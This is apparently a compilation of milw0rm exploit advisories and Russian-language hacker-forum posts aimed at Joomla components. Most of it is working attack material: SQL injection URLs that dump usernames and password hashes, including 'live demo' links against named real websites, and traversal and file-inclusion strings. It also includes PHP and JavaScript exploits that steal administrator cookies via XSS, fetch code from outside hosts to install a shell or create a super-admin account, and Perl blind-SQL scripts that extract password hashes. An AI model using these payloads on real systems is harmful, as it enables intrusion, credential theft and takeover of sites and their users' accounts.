[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-

########################################

[~] ScriptName: "Joomla"
[~] Component: "MaianMusic (com_maianmusic)"
[~] Version: "1.2.1"
[~] Date: "09-26-2008"
[~] Author: "Arelowo Alao & David Bennett"
[~] Author E-mail: "Alao@aretimes.com"
[~] Author URL: "www.aretimes.com"

########################################

[~] Exploit: /index.php?option=com_maianmusic&section=category&category=[SQL]&Itemid=70
[~] Example: /index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),pass word)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21+from+jos_users--&Itemid=70

########################################

[~] LiveDemo: http://musicsunderground.com/index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),pass word)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21+from+jos_users--&Itemid=70&lang=en

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de

########################################

----------------------------------------------------------------+

################################################## ###########################
# #
# Joomla Component Cmimarketplace Directory Traversal Vulnerability #
# #
################################################## ###########################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-

########################################

[~] ScriptName: "Joomla"
[~] Component: "Cmimarketplace (com_cmimarketplace)"
[~] Date: "August 2008"
[~] Author: "Magnetic Merchandising Inc."
[~] E-mail: "client@ijobid.com"
[~] Author URL: "www.ijobid.com"

########################################

[~] Exploit: /index.php?option=com_cmimarketplace&Itemid=70&viewit=[Directory]&cid=1

[~] Example: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1

########################################

[~] Live Demo: http://democmi.ijobid.com/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de

########################################

© milw0rm.com [2009-04-08]

Cегодня пришлось дело иметь дело с Джумлой 1.5, начал искать сплоенты, нашел на оффе http://forum.joomla.org/viewtopic.php?f=300&t=371705
Вот написал небольшой експлоит:
<?php
// Удаление произвольных изображений в каталоге Joomla
// by [underwater]
$WEB_VULNERABLE = 'http://www.site.com/';
if(!$archive = obt_archive($WEB_VULNERABLE.'images/')){
echo '<iframe src="'.$WEB_VULNERABLE.'administrator/index.php?option=com_media&task=file.delete&tmpl=component&folder=&rm[]=index.html" width="1" height="1" frameborder="0"></iframe>';
ob_get_contents();
sleep(5);
}
if($archive= obt_archive($WEB_VULNERABLE.'images/')){
foreach($archivos as $valor){
if(eregi('/', $valor[(count($valor)-1)])){ $tipo = 'folder'; }else{ $tipo = 'file'; }
echo '<iframe src="'.
$WEB_VULNERABLE.'administrator/index.php?option=com_media&task='.$tipo
.'.delete&tmpl=component&folder=&rm[]='.urlencode($valor)
.'" width="1" height="1" frameborder="0"></iframe>';
}
}
function obt_archive($url){
$buffer = explode(']"> <a href="', file_get_contents($url));
foreach($buffer as $item=> $valor){
if($item != '0'){
$temp = explode('"', $valor);
$retorn[count($retorno)] = $temp[0];
}
}
return $retorn;
}
?>

Потом нашел ксс
http://127.0.0.1/joomla/index.php?searchword=%253c%2553%2543%2572%2549%257 0%2554%2520%2578%253d%2578%253e%2561%256c%2565%257 2%2574%2528%2530%2530%2530%2530%2530%2529%253c%252 f%2573%2543%2572%2549%2570%2554%253e&ordering=newest&searchphrase=all&option=com_search
Не знаю была ли найдена ксс до меня или нет, я нигде не встречал, самое вкусное что через нее можно залить шелл, вот сплоит:

<?php
error_reporting(0);

$EXPL['SITE_VULNERABLE'] = 'http://127.0.0.1/joomla/';
$EXPL['URL_COM_SHELL'] = 'http://127.0.01/shell'; // Путь к шеллу

$EXPL['XSS'] = '<script '.
'src="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=js" ></script>';

if($_GET['act'] == 'js'){
die('

var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/=";
function base64_encode(input){
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
do{
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if(isNaN(chr2)){
enc3 = enc4 = 64;
}else if(isNaN(chr3)){
enc4 = 64;
}
output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4);
}while(i < input.length);
return output;
}
window.location.href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=galletas&sabor=" + base64_encode(document.cookie);
');

}elseif($_GET['act'] == 'gall'){
if(!$cookies = base64_decode($_GET['sabor'])) die('<strong>Нет печенья(</strong>');
$buffer = http_get($EXPL['SITE_VULNERABLE'].'/administrator/index.php?option=com_installer', $cookies);
$buscar = expl('hidden" name="', $buffer);
foreach($buscar as $encont){
$encont = expl('"', $encont);
$encont = $encont[0];
if(strlen($encont) == 32){
$hash = $encont;
break;
}
}
$buffer = http_post(
$EXPL['SITE_VULNERABLE'].'/administrator/index.php', $cookies,
$hash.'=1&install_url='.urlencode($EXPL['URL_COM_SHELL']).'&installtype=url&task=doInstall&option=com_installer&'
);
if(eregi('200 OK', http_get($EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'))){
/ / Операция выполнена успешно! шелл /modules/mod_artimesk/mod_artimesk.php
header('UnderWhat?!');
$explot = true;
}else{
$explot = false;
}
if($archiv_handle = fopen('log_('.date('Y.m.d.H.i.s').')_.txt', 'x')){
if($explot){
fwrite($archiv_handle, 'Шелл успешно загружен'. URL: '.$EXPL['SITE_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'."\x0D\x0A");
header('location: https://forum.antichat.ru');
}else{
fwrite($archiv_handle,
.$EXPL['SITIO_VULNERABLE'].' Експлоит не может быть использован, так как не совместима версия, или у вас нету админ прав.'."\x0D\x0A");
}
fclose($archiv_handle);
}
exit($explot);
}

// Выполнение произвольного кода яваскрипт
$pedir = $EXPL['SITЕ_VULNERABLE'].'/index.php?searchword='.urlencode(urlencode($EXPL['XSS'])).'&ordering=&searchphrase=all&option=com_search';
if(http_get($pedir, 'null[]=token')){
header('location: '.$EXPL['SITIO_VULNERABLE'].'administrator/index.php?option=com_search');
}else{
die('hola :-s');
}

function http_post($url, $cookies, $postdata){
$timeout = 100;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
$conten = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
if($conten)
return $conten;
else
return $error;
}

function http_get($url, $cookies){
$timeout = 100;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
$conten = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
if($conten)
return $conten;
else
return $error;
}

?>

/*
RSMonials XSS Exploit

http://www.rswebsols.com/downloads/category/14-download-rsmonials-all?download=23%3Adownload-rsmonials-component

Google Dork: allinurl:option=com_rsmonials

Anything entered into the form gets rendered as HTML, so you can add tags
as long as they don't include quotes (magic quotes eats them, if it's on).
This component ships with settings that prevent posting by default, but
the administrator page for the testimonials renders your script in its entirety.

Proof of Concept 1: Remote file upload

Visit http://target.com/index.php?option=com_rsmonials and post a comment.
At the end of your glowing comment about how awesome the site is, attach this:

<script src=http://badsite.com/evil.js></script>

Now, when your admin goes to the com_rsmonials "Testimonials" page, your
script will execute. In this example, a hidden iframe loads up the install
page and installs a 'custom' module.

*/

var exploited = false;
var iframe = document.createElement( 'iframe' );
var reg = new RegExp( 'administrator' );
if( reg.test( location.href ) )
{
iframe.src = 'index.php?option=com_installer';
iframe.setStyle( 'display', 'none' );
document.body.appendChild( iframe );
iframe.addEvent( 'load', exploit );
}
function exploit( e )
{
if( exploited != true )
{
var doc = e.target.contentDocument; if( !doc ) return;
var inp = doc.getElementById( 'install_url' );
inp.value = 'http://badsite.com/exploit.zip';
var b = inp.parentNode.getElementsByTagName( 'input' )[1];
b.onclick();
exploited = true;
}
}

/*

Proof of Concept 2: New Super Administrator

Here's a drop-in replacement for the 'exploit' function above:

function exploit( e )
{
if( exploited != true )
{
var newForm = false;
var doc = e.target.contentDocument; if( !doc ) return;
var nb = doc.getElementsByTagName( 'a' ); if( !nb ) return;
var i = 0;
for( ; i<nb.length; i++ )
{
if( nb[i].parentNode.id == 'toolbar-new' )
{
nb[i].onclick();
}
else if( nb[i].parentNode.id == 'toolbar-save' )
{
doc.getElementById( 'name' ).value = 'hacked';
doc.getElementById( 'username' ).value = 'hacked';
doc.getElementById( 'email' ).value = 'your@freemail.com';
doc.getElementById( 'password' ).value = 'password';
doc.getElementById( 'password2' ).value = 'password';
var g = doc.getElementById( 'gid' );
g.selectedIndex = g.options.length - 1;
nb[i].onclick();
exploited = true;
}
}
}
}

If the admin is a Super Admin, then you could be too... just remember to watch
your freemail account for Joomla's account notification!

*/
/* jdc 2009 */

# milw0rm.com [2009-04-22]

com_dictionary

/components/com_dictionary/dictionary.php

if($wordid)//выбрано слово, надо показать описание
{
echo "<h3>Описание</h3>";
$database->setQuery("SELECT wordid,word,worddescription FROM #__dictionary where wordid=".$wordid);
$result = $database->query();
$row = mysql_fetch_object($result);


index.php?option=com_dictionary&Itemid=125&wordid=-3+union+select+1,username,password+from+jos_users

Прочитал в каком-то испанском блоге про следующую уязвимость:

http://127.0.0.1/joomla/index.php?option=com_user&task=register
В имени пользователя можно вставить HTML-код, есть небольшой фильтр, который обходится кавычками ;P
Например, что-то типа:
number" onclick="document.location='http://www.site.com/?cookies.php?cookies='+document.cookie" x="


Дальше дело техники - однопиксельная пикча делает перенаправление на евил скрипт.

Находится данное чудо тут: /administrator/components/com_users/views/user/tmpl/form.php

Прикольно то что джумло-кодеры проепали точто также еще 10 файлов)

Clickheat [fr Joomla]

Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1

Vuln file: install.clickheat.php

Viln Code:
require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');

Exploit:
http://site.com/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=..../../../../../../../etc/passwd%00

Vuln file: _main.php

Viln Code:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );

Exploit:
http://site.com/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00

Vuln file: main.php

Viln Code:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );

Exploit:
http://site.com/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00

Vuln file: Cache.php

Viln Code:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');

Exploit:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00

Vuln file: Clickheat_Heatmap.php

Viln Code:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');

Exploit:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00

Vuln file: GlobalVariables.php

Viln Code:
require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');


Exploit:
http://site.com/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00

Нда вобщем-то...)

Joomla Component ArtForms 2.1 b7 Remote File Inclusion Vulnerabilities

ArtForms 2.1b7 remote file includes

From Turkey
iskorpitx (O bir dünya markası Asla Taklit Edilemez)

// swfmovie.php - swf output and config

/* output captcha image */

/* output captcha mp3 */

----------------------------------------------------------------------------------
[path]/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=*shell

[path]/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=*shell

[path]/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=*shell
-----------------------------------------------------------------------------------
by iskorpitx
admin@mavi1.org

# milw0rm.com [2009-05-15]

Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection

================================================== ================================
Joomla Component com_juser (id) SQL injection Vulnerability
================================================== ================================

################################################## #
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)
[+] Email : chipdebios[alt+64]gmail.com

################################################## #

http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
------
SQL code:
+and+1=2+union+select+1,2,concat(username,0x3a,pas sword)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_ users--
-----

http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3 a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from +jos_users--

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++


<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"©2007</copyright>
<license>Comercial</license>
<authorEmail>support@joomlaequipment.com</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>

# milw0rm.com [2009-06-01]

Joomla Component com_vehiclemanager 1.0 RFI Vulnerability

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Joomla com_vehiclemanager 1.0 Remote File Include

Download: http://ordasoft.com/Download-document/1-Vehicle-Manager-Basic.html

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
-> ... /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=shell?

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Thanx: str0ke, VoLkan

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2009-06-09]

Joomla Component com_jumi (fileid) Blind SQL Injection Exploit

------------------------------------------------------------------------------
Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------


################################################## ###
# [+] Author : Chip D3 Bi0s #
# [+] Email : chipdebios[alt+64]gmail.com #
# [+] Vulnerability : Blind SQL injection #
################################################## ###



Example:

http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>

n=number fileid valid

<Sql code>:

'+and+(select+substring(concat(1,password),1,1)+fr om+jos_users+limit+0,1)=1/* '+and+(select+substring(concat(1,username),1,1)+fr om+jos_users+limit+0,1)=1/* /index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username) ,1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...

DEMO LIVE:
http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(usern ame,0x3a,password)+from+jos_users+limit+0,1),1,1)) =101/*

etc, etc....

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

if you want to save the work, you can use the following script

-------------------------------

#!/usr/bin/perl -w use LWP::UserAgent; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection \n\n"; print "\t\t-----------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path: "; chomp(my $target=<STDIN>); print " [-] Introduce fileid: "; chomp($z=<STDIN>); print " [+] Password: "; $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter { #c referido a ascci 48-57, 97-102 for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } for ($c=97;$c<=102;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } }

# milw0rm.com [2009-06-15]

Joomla Component com_ijoomla_rss Blind SQL Injection Exploit

#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " oooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooooooooooooo\n"; print " o Joomla Component com_ijoomla_rss Blind SQL Injection Exploit o\n"; print " o Author:xoron o\n"; print " o More info:http://joomla15.ijoomlademo.com o\n"; print " o vendor:http://ijoomlademo.com o\n"; print " o Dork : com_ijoomla_rss o\n"; print " o Usage: perl bachir.pl host path <options> o\n"; print " o Example: perl bachir.pl www.host.com /joomla/ -s 2 o\n"; print " oooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooooooooooooo\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $sid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "s=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"s"}) { $sid = $options{"s"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $sid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $sid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $sid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")"; my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "seminar_boxA"; if($content =~ /$regexp/) { return 1; } else { return 0; } }

# milw0rm.com [2009-06-15]

Joomla Component com_tickets <= 2.1 (id) SQL Injection Vuln

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++
Joomla Component com_tickets (id) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++

################################################## #
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt
[+] Vulnerability : SQL injection

################################################## #

Info component:
ššššššššššššššš
Name : Tickets
Version : 0.1 & 2.1
Author : Paul Coogan
Author email : paul@ideabuzz.com
Web author : http://www.ideabuzz.com

################################################## #

Example: http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]

n = id valid

Demo Live Joomla : version 2.1
šššššššššššššššššššššššššššššš

http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(usernam e,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+ from+jos_users/*

Demo Live Mambo : Version 0.1
ššššššššššššššššššššššššššššš

http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(userna me,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22+from+mos_users/*

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-06-22]

com_svmap
Вот наткнулся случайно. Может кто доведет до ума, если, конечно, есть что доводить.
www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2

com_svmap
Вот наткнулся случайно. Может кто доведет до ума, если, конечно, есть что доводить.
www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
если не ошибаюсь это не дыра
просто ошибка в обработке данных

SQL-Injection в компоненте doQment под joomla
Vulnerability : уязвимый параметр cid=

Example:
http://www.agmodena.it/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users/**/where/**/usertype=CHAR(83,117,112,101,114,32,65,100,109,105 ,110,105,115,116,114,97,116,111,114)#&Itemid=92
Dork: inurl:com_doqment + cid=
# shell_c0de

Joomla Almond Classifieds Component SQL Injection and Cross-Site Scripting

Description:
Moudi has reported some vulnerabilities in the Almond Classifieds component for Joomla, which can be exploited by malicious people to conduct SQL injection and cross-site scripting attacks.

1) Input passed via the "replid" to index.php (when "option" is set to "com_aclassf", "Itemid" is set to a valid id, "ct" to "manw_repl" and "md" is set to "add_form") is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2) Input passed via the "addr" parameter to components/com_aclassf/gmap.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerabilities are reported in version 7.5. Other versions may also be affected.


################################################## #########################
#-----------------------------I AM MUSLIM !!------------------------------#
################################################## #########################

================================================== ============================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ /___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|


================================================== ============================
[�] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
================================================== ============================
[�] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
================================================== ============================

[�] Script: [ Joomla Almond Classifieds v.7.5 ]
[�] Language: [ PHP ]
[�] Download: [ http://www.almondsoft.com ]
[�] Founder: [ Moudi <m0udi@9.cn> ]
[�] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[�] Team: [ EvilWay ]
[�] Dork: [ OFF ]
[�] Price: [ $195 ]
[�] Site : [ https://security-shell.ws/forum.php ]

################################################## #########################

===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===

[�] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]

[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE

[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> TRUE
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> FALSE

===[ Exploit XSS + LIVE : vulnerability ]===

[�] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]

[�] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>

Author: Moudi

################################################## #########################

Joomla component com_fireboard SQL-inj

Уязвимый параметр func
?func=who',%20userid=123,%20link=(SELECT %20jos_users.password%20FROM%20jos_users%20WHERE%2 0jos_users.id=123)%20--%20a

Более подробно смотрим сюда
http://forum.antichat.ru/threadnav130926-1-10.html
и вот сюда
http://forum.antichat.ru/showpost.php?p=1409117&postcount=33

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++

################################################## #
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : Blind SQL injection

################################################## #

Example:
http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code] n:valid Itemid

Sql code:
+and+(select+substring(concat(1,password),1,1)+fro m+jos_users+limit+0,1)=1/*

etc, etc...

DEMO LIVE:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username) ,1,1)+from+jos_users+limit+0,1)=1

http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(passw ord,0x3a,username)+from+jos_users+limit+0,1),1,1)) =97 !False ¡¡¡¡

http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(passw ord,0x3a,username)+from+jos_users+limit+0,1),1,1)) =98 ¡True ¡¡¡¡

etc, etc...

# milw0rm.com [2009-08-01]

http://wwww.host.org/Path : http://www.cd7.com.ec/
[-] Introduce Itemid : 66
[-] Introduce coincidencia : http://www.cd7.com.ec/forum/

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++


#!/usr/bin/perl -w use LWP::UserAgent; use Benchmark; my $t1 = new Benchmark; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jfusion (Itemid) Blind SQL-injection \n\n"; print "\t\t-------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path : ";chomp(my $target=<STDIN>); print " [-] Introduce Itemid : ";chomp($z=<STDIN>); print " [-] Introduce coincidencia : ";chomp($w=<STDIN>); $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); print "----------------Inyectando----------------\n"; #es Vulnerable? $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=1"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=2"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";} else {print " [-] Vulnerable :)\n"; for ($x=1;$x<=32;$x++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))>57"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}#para alininear 0..9 con los 10-32 if ($content =~ /$regexp/) { for ($c=97;$c<=102;$c++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." "; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;} } } else { for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." "; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;} } } } print " [+] Password :"." ".join('', @caracter) . "\n"; my $t2 = new Benchmark; my $tt = timediff($t2, $t1); print "El script tomo:",timestr($tt),"\n"; } } else {print " [-] Exploit Fallo :(\n";}

# milw0rm.com [2009-08-01]

Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit

<?php

/*
--------------------------

Joomla <=1.0.15 Component com_pms <=2.0.4 (Ignore-List) SQl-Injection Vuln

--------------------------

Author: M4dhead

Vulnerable joomla component : com_pms

Conditions : magic_quotes_gpc = On or Off it doesn't matter ;)

